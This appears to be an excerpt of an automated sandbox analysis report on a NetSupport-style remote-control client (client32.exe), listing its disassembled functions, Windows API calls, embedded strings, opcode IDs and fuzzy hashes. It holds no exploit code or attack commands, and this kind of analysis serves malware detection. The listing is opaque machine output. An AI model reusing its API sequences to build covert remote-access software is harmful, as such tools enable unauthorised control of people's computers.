                                                                                                                                                                  • Part of subcall function 11162B51: __FF_MSGBANNER.LIBCMT ref: 11162B6A
                                                                                                                                                                  • Part of subcall function 11162B51: __NMSG_WRITE.LIBCMT ref: 11162B71
                                                                                                                                                                  • Part of subcall function 11162B51: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162B96
                                                                                                                                                                • _memset.LIBCMT ref: 1115765F
                                                                                                                                                                • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 111576BF
                                                                                                                                                                • _malloc.LIBCMT ref: 111576E7
                                                                                                                                                                • _free.LIBCMT ref: 111577C3
                                                                                                                                                                • _free.LIBCMT ref: 111577CF
                                                                                                                                                                  • Part of subcall function 110EDF10: _memmove.LIBCMT ref: 110EE02F
                                                                                                                                                                • API ID: _free_malloc$AllocateBitsHeap_memmove_memset
                                                                                                                                                                • String ID: (
                                                                                                                                                                • API String ID: 3140430649-3887548279
                                                                                                                                                                • Opcode ID: fb824e49bafe16ac61aeddce42f9fdce132aaf5f509c088f0f52e644acdd3b4c
                                                                                                                                                                • Instruction ID: 5149e9e96c6edf4fd4ef2e7de0944cd089d7251e2f1b70461ebbd6bcbe1ab8a4
                                                                                                                                                                • Opcode Fuzzy Hash: fb824e49bafe16ac61aeddce42f9fdce132aaf5f509c088f0f52e644acdd3b4c
                                                                                                                                                                • Instruction Fuzzy Hash: EB5161B5A016149FDB50DF28CC81F9AB7B9EF89304F4551A9EA19DB341DB30EA40CF68
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                                                                                                  • Part of subcall function 110B0260: _memset.LIBCMT ref: 110B026C
                                                                                                                                                                  • Part of subcall function 110B0260: _memset.LIBCMT ref: 110B029D
                                                                                                                                                                  • Part of subcall function 110B0AD0: timeGetTime.WINMM(_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B0AD6
                                                                                                                                                                  • Part of subcall function 110B0AD0: timeGetTime.WINMM(111F00F8,111E5C98,?), ref: 110B0BA5
                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FA,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B743D
                                                                                                                                                                • GetDC.USER32(00000000), ref: 110B7481
                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000E), ref: 110B748C
                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000C), ref: 110B7497
                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 110B74A3
                                                                                                                                                                  • Part of subcall function 110B3090: SetEvent.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30A8
                                                                                                                                                                  • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B30B5
                                                                                                                                                                  • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30C8
                                                                                                                                                                  • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30D5
                                                                                                                                                                  • Part of subcall function 110B3090: WaitForSingleObject.KERNEL32(?,000003E8,111F00F8,111E5C98,?,110B754E,00000000,_debug,TraceScrape,00000000,00000000,00000000,?), ref: 110B30F3
                                                                                                                                                                  • Part of subcall function 110B3090: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,110B7594), ref: 110B3100
                                                                                                                                                                • API ID: CloseHandle$CapsDeviceObjectSingleTimeWait_memsettime$EventRelease__wcstoi64
                                                                                                                                                                • String ID: TraceScrape$_debug
                                                                                                                                                                • API String ID: 2936113293-4091781993
                                                                                                                                                                • Opcode ID: 9cdd8e8a5d521a6398e64c309cb34abd0cea1cc8d3252b81e48429c5feacb1e5
                                                                                                                                                                • Instruction ID: 6857b597a808110f0f281143ea82df92f461d6df4c4e0b5b1330fe4484300919
                                                                                                                                                                • Opcode Fuzzy Hash: 9cdd8e8a5d521a6398e64c309cb34abd0cea1cc8d3252b81e48429c5feacb1e5
                                                                                                                                                                • Instruction Fuzzy Hash: E941A679E042469BDB05CFB4C8D4FAFBBB5EB84704F1941ADE905AB285DA70EC04C7A4
                                                                                                                                                                APIs
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11027053
                                                                                                                                                                • TranslateMessage.USER32(?), ref: 11027081
                                                                                                                                                                • DispatchMessageA.USER32(?), ref: 1102708B
                                                                                                                                                                • Sleep.KERNEL32(000003E8), ref: 11027114
                                                                                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 1102717A
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$DispatchSleepTranslate
                                                                                                                                                                • String ID: Bridge$BridgeThread::Attempting to open bridge...
                                                                                                                                                                • API String ID: 3237117195-3850961587
                                                                                                                                                                • Opcode ID: 0527f6f062edf77291c750114b7d9886b355368a75c305f9b203373b5eaba6dc
                                                                                                                                                                • Instruction ID: 926780c6f4d8c8949c1ee256bdfa0d08ed5449f0693c43c0c5ab50156846c558
                                                                                                                                                                • Opcode Fuzzy Hash: 0527f6f062edf77291c750114b7d9886b355368a75c305f9b203373b5eaba6dc
                                                                                                                                                                • Instruction Fuzzy Hash: AB41B475D01626DBEB15CBEDCC84EBEBBB9AB54708F900169E92593244E735E500CBA0
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowPlacement.USER32(00000000,0000002C,110BFEBC,?,Norm,110BFEBC), ref: 110B90E4
                                                                                                                                                                • MoveWindow.USER32(00000000,110BFEBC,110BFEBC,110BFEBC,110BFEBC,00000001,?,Norm,110BFEBC), ref: 110B9156
                                                                                                                                                                • SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B91B1
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
                                                                                                                                                                • String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
                                                                                                                                                                • API String ID: 1092798621-1973987134
                                                                                                                                                                • Opcode ID: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
                                                                                                                                                                • Instruction ID: fa08d4082dbdb83dc84805081e5a13701295f49ac71a08f55a689e0031bf859b
                                                                                                                                                                • Opcode Fuzzy Hash: bb4fee7a640cddfa8292c04b347aeb0b9ef3b046aecc10af90a567252941b4bf
                                                                                                                                                                • Instruction Fuzzy Hash: 6A411DB5B0020AAFDB08DFA4C895EAEF7B5FF88304F104669E519A7644DB30B945CB90
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1112A9E0: LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112AA16
                                                                                                                                                                  • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112AA33
                                                                                                                                                                  • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112AA3D
                                                                                                                                                                  • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,socket), ref: 1112AA4B
                                                                                                                                                                  • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112AA59
                                                                                                                                                                  • Part of subcall function 1112A9E0: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112AA67
                                                                                                                                                                  • Part of subcall function 1112A9E0: FreeLibrary.KERNEL32(00000000), ref: 1112AADC
                                                                                                                                                                • LoadLibraryA.KERNEL32(ws2_32.dll,?,?,00000000), ref: 1112B38A
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ntohl), ref: 1112B3A2
                                                                                                                                                                • _calloc.LIBCMT ref: 1112B3AD
                                                                                                                                                                • _free.LIBCMT ref: 1112B44B
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 1112B462
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$Library$FreeLoad$_calloc_free
                                                                                                                                                                • String ID: ntohl$ws2_32.dll
                                                                                                                                                                • API String ID: 2881363997-4165132517
                                                                                                                                                                • Opcode ID: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
                                                                                                                                                                • Instruction ID: 62f3d354d7df00a53f20e52f5f0b7ab5f0e2fb1a0c0f97b8c5a029639f714dd3
                                                                                                                                                                • Opcode Fuzzy Hash: a62c3fe90116abab52543d5ca7f352ed5c693b003b457ddebdd86233b9ebb92f
                                                                                                                                                                • Instruction Fuzzy Hash: 67318D75E00229CBD7509F64CD80A9AF7B8FF48715F6081A6DC99A7200DF30AA858FD4
                                                                                                                                                                APIs
                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1100F3FD
                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1100F420
                                                                                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 1100F4A4
                                                                                                                                                                • __CxxThrowException@8.LIBCMT ref: 1100F4B2
                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1100F4C5
                                                                                                                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F4DF
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                                                                                • String ID: bad cast
                                                                                                                                                                • API String ID: 2427920155-3145022300
                                                                                                                                                                APIs
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 11105531
                                                                                                                                                                • EnterCriticalSection.KERNEL32 ref: 11105548
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1110554E
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 111055EB
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111F060C), ref: 111055F8
                                                                                                                                                                Strings
                                                                                                                                                                • Warning. simap lock held for %d ms, xrefs: 11105609
                                                                                                                                                                • Warning. took %d ms to get simap lock, xrefs: 1110555F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick$CriticalSection$EnterLeave
                                                                                                                                                                • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                                                                                                • API String ID: 956672424-625438208
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeStringUninitializeW@16
                                                                                                                                                                • String ID: HID$PS/2$USB$Win32_PointingDevice
                                                                                                                                                                • API String ID: 1826621714-1320232752
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InitializeStringUninitializeW@16
                                                                                                                                                                • String ID: HID$PS/2$USB$Win32_Keyboard
                                                                                                                                                                • API String ID: 1826621714-116512005
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,00000000), ref: 110F12C5
                                                                                                                                                                • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 110F12DA
                                                                                                                                                                  • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                                                                                                • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1333
                                                                                                                                                                • CreateFileA.KERNEL32(?,00000000,00000000,00000000,00000000,04000000,00000000), ref: 110F1378
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CreateName$ModulePathShort_strrchr
                                                                                                                                                                • String ID: \\.\$nsmvxd.386$pcdvxd.386
                                                                                                                                                                • API String ID: 1318148156-3179819359
                                                                                                                                                                • Opcode ID: 2f41f20b5722acf40c0130390847ae355a62842386f7592ccd3cf37bf6e28cb4
                                                                                                                                                                • Instruction ID: ccc4368b31194543ced42f6667aa0c2d7b9d0de7acad865b100199d2ac62ce57
                                                                                                                                                                • Opcode Fuzzy Hash: 2f41f20b5722acf40c0130390847ae355a62842386f7592ccd3cf37bf6e28cb4
                                                                                                                                                                • Instruction Fuzzy Hash: E431C171A44725AFD724DF64D891B96F7F5EB08708F008168E2B88B6C0D3B1B984CB94
                                                                                                                                                                APIs
                                                                                                                                                                • _memmove.LIBCMT ref: 11081599
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                                                                                                • String ID: !m_bReadOnly$..\CTL32\DataStream.cpp$IsA()$m_nLength>=nBytes$nBytes>=0$pData
                                                                                                                                                                • API String ID: 1528188558-3417006389
                                                                                                                                                                • Opcode ID: 5a6dd2cb1ae321d45fdc77f2bd305be133cdcd359d19f74f6fae9b55b02ef328
                                                                                                                                                                • Instruction ID: bcd891fc28fbbd32a331a23a4691bb25227bcd5c714dc9c047b8a33ad8a1a7bc
                                                                                                                                                                • Opcode Fuzzy Hash: 5a6dd2cb1ae321d45fdc77f2bd305be133cdcd359d19f74f6fae9b55b02ef328
                                                                                                                                                                • Instruction Fuzzy Hash: 4B21087DF007626FC311DA96BC51FDBBBA85FE0348F454029E64A17243EA71B600C6A6
                                                                                                                                                                APIs
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1110543F
                                                                                                                                                                • EnterCriticalSection.KERNEL32(111F060C), ref: 11105448
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1110544E
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 111054D5
                                                                                                                                                                • LeaveCriticalSection.KERNEL32(111F060C), ref: 111054DE
                                                                                                                                                                Strings
                                                                                                                                                                • Warning. simap lock held for %d ms, xrefs: 111054F1
                                                                                                                                                                • Warning. took %d ms to get simap lock, xrefs: 1110545A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CountTick$CriticalSection$EnterLeave
                                                                                                                                                                • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                                                                                                                • API String ID: 956672424-625438208
                                                                                                                                                                • Opcode ID: d02c5f874049aedfdaab212aa8ce20a9622e81c413980f443b3a686a6aaa7cc8
                                                                                                                                                                • Instruction ID: 64ddf6fa83837c79953b1455a65c42fcbb04bb5d8fc8451291b68bd15a81fe34
                                                                                                                                                                • Opcode Fuzzy Hash: d02c5f874049aedfdaab212aa8ce20a9622e81c413980f443b3a686a6aaa7cc8
                                                                                                                                                                • Instruction Fuzzy Hash: 7A21A174F012999FE785CF74C988FA9FFD29B8532DF5740A8D009CB261E620D844CB41
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll,59FD48C0,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 11031692
                                                                                                                                                                • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,1117F5B8,000000FF,?,1103176B), ref: 110316D0
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,ProcessIdToSessionId), ref: 110316DE
                                                                                                                                                                • SetLastError.KERNEL32(00000078,?,?,?,?,?,?,?,?,?,?,00000000,1117F5B8,000000FF,?,1103176B), ref: 110316F6
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,1117F5B8,000000FF,?,1103176B), ref: 11031704
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressCurrentErrorFreeLastLoadProcProcess
                                                                                                                                                                • String ID: Kernel32.dll$ProcessIdToSessionId
                                                                                                                                                                • API String ID: 1613046405-2825297712
                                                                                                                                                                • Opcode ID: 9f5e3f42544bddd3b0145a119ee7f19b5a2311e828379e2299be25163ccbbf9a
                                                                                                                                                                • Instruction ID: 0197efecc3baa36c0bc3c0ad206dfbbb851aeab291dc6baa74a0747e288254c4
                                                                                                                                                                • Opcode Fuzzy Hash: 9f5e3f42544bddd3b0145a119ee7f19b5a2311e828379e2299be25163ccbbf9a
                                                                                                                                                                • Instruction Fuzzy Hash: C421BEB1D25269AFCB04DFA9D984AAEFFB8FB4CA11F10412BF421E3244D7B419018B90
                                                                                                                                                                APIs
                                                                                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,59FD48C0,1102FCB2,00000000), ref: 1101747E
                                                                                                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1101748E
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 110174D2
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 110174ED
                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 110174F8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Library$AddressCreateErrorEventFreeLastLoadProc
                                                                                                                                                                • String ID: Kernel32.dll$QueueUserWorkItem
                                                                                                                                                                • API String ID: 4285663087-4150702566
                                                                                                                                                                • Opcode ID: 73aa0e1935fa4bf5c5b602c48ad883a9c71c6c5c78e1718474ad12d225268118
                                                                                                                                                                • Instruction ID: a9f0235e3cef9bf437ca1ce1440a094b1b6e254119b036fab730dd1316c19a2b
                                                                                                                                                                • Opcode Fuzzy Hash: 73aa0e1935fa4bf5c5b602c48ad883a9c71c6c5c78e1718474ad12d225268118
                                                                                                                                                                • Instruction Fuzzy Hash: F021D5B1D65678EBCB10CFA9D988A9EFFB8FB49B10F10411BF421A2244DBB445008B91
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11144BD0: GetModuleFileNameA.KERNEL32(00000000,?,00000104,11194AB8), ref: 11144C3D
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110F4CB), ref: 11144C7E
                                                                                                                                                                  • Part of subcall function 11144BD0: SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 11144CDB
                                                                                                                                                                • wsprintfA.USER32 ref: 110277AE
                                                                                                                                                                  • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,1110F4CB,76968400,?), ref: 111432C7
                                                                                                                                                                  • Part of subcall function 11143230: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 111432E7
                                                                                                                                                                  • Part of subcall function 11143230: CloseHandle.KERNEL32(00000000), ref: 111432EF
                                                                                                                                                                • wsprintfA.USER32 ref: 110277D8
                                                                                                                                                                • ShellExecuteA.SHELL32(00000000,open,?,/EM,00000000,00000001), ref: 1102782B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CreateFolderPathwsprintf$CloseExecuteHandleModuleNameShell
                                                                                                                                                                • String ID: "%sWINST32.EXE"$"%sWINSTALL.EXE"$/EM$open
                                                                                                                                                                • API String ID: 816263943-3387570681
                                                                                                                                                                • Opcode ID: 0c6371de7803de7a4a3dd9fa395c175fba27eeb06d18d193ba4ca93d1482e223
                                                                                                                                                                • Instruction ID: b7008939c9ec8d9c06a6859de4cfcca3004c8f6374e2649cbbd7cd794522c2fd
                                                                                                                                                                • Opcode Fuzzy Hash: 0c6371de7803de7a4a3dd9fa395c175fba27eeb06d18d193ba4ca93d1482e223
                                                                                                                                                                • Instruction Fuzzy Hash: 0C11E7B4A0121EABDB10EBB59C85FAEB3A8AF4470CF5001E9E91597581EB71B900CB91
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11145440: _memset.LIBCMT ref: 11145485
                                                                                                                                                                  • Part of subcall function 11145440: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114549E
                                                                                                                                                                  • Part of subcall function 11145440: LoadLibraryA.KERNEL32(kernel32.dll), ref: 111454C5
                                                                                                                                                                  • Part of subcall function 11145440: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111454D7
                                                                                                                                                                  • Part of subcall function 11145440: FreeLibrary.KERNEL32(00000000), ref: 111454EF
                                                                                                                                                                  • Part of subcall function 11145440: GetSystemDefaultLangID.KERNEL32 ref: 111454FA
                                                                                                                                                                • CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 1109166D
                                                                                                                                                                • UpdateWindow.USER32(?), ref: 110916BF
                                                                                                                                                                Strings
                                                                                                                                                                • E:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110916A9
                                                                                                                                                                • NSMClassList, xrefs: 11091667
                                                                                                                                                                • m_hWnd || !"FindClass Window failed to create", xrefs: 11091684
                                                                                                                                                                • findclass.cpp, xrefs: 1109167F
                                                                                                                                                                • m_hWnd, xrefs: 110916AE
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: LibraryWindow$AddressCreateDefaultFreeLangLoadProcSystemUpdateVersion_memset
                                                                                                                                                                • String ID: E:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$NSMClassList$findclass.cpp$m_hWnd$m_hWnd || !"FindClass Window failed to create"
                                                                                                                                                                • API String ID: 2732523160-3743713504
                                                                                                                                                                • Opcode ID: 3ed2b513fa75c425ddb4287c1f3f8ec767a5c677f8c57cd9371fb6cf693f00a0
                                                                                                                                                                • Instruction ID: 4079d7ea69e215604455db4dd5849739ae81fed9d6595959b1e7783e66955440
                                                                                                                                                                • Opcode Fuzzy Hash: 3ed2b513fa75c425ddb4287c1f3f8ec767a5c677f8c57cd9371fb6cf693f00a0
                                                                                                                                                                • Instruction Fuzzy Hash: 23012D39F4030AB7E3109656EC41FA7F7D89B84728F248034FA1DEA680E670F410C795
                                                                                                                                                                APIs
                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 1115F12E
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                                                                                                • SystemParametersInfoA.USER32(00002000,00000000,00000000,00000000), ref: 1115F14F
                                                                                                                                                                • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000000), ref: 1115F15C
                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 1115F162
                                                                                                                                                                • SystemParametersInfoA.USER32(00002001,00000000,00000000,00000000), ref: 1115F177
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: InfoParametersSystem$ForegroundWindow$ErrorExitLastMessageProcesswsprintf
                                                                                                                                                                • String ID: ..\ctl32\wndclass.cpp$m_hWnd
                                                                                                                                                                • API String ID: 3960414890-2201682149
                                                                                                                                                                • Opcode ID: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                                                                                                • Instruction ID: 490c9e9faa58dc1df28f1acf4c3aa341e93c1bd023cf24429d0d7fa3412acb83
                                                                                                                                                                • Opcode Fuzzy Hash: a1720cd828d96b31de3ae11535927becd6a6cc7cf2a6108b9844e59effaa0828
                                                                                                                                                                • Instruction Fuzzy Hash: 8F01F276790318BBE30096A9CC86F55F398EB54B14F104126F718AA1C0DAF1B851C7E1
                                                                                                                                                                APIs
                                                                                                                                                                • LoadMenuA.USER32(00000000,00002EFF), ref: 1100338E
                                                                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 110033BA
                                                                                                                                                                • GetSubMenu.USER32(00000000,00000000), ref: 110033DC
                                                                                                                                                                • DestroyMenu.USER32(00000000), ref: 110033EA
                                                                                                                                                                  • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                                                                                                  • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                                                                                                  • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                                                                                                  • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
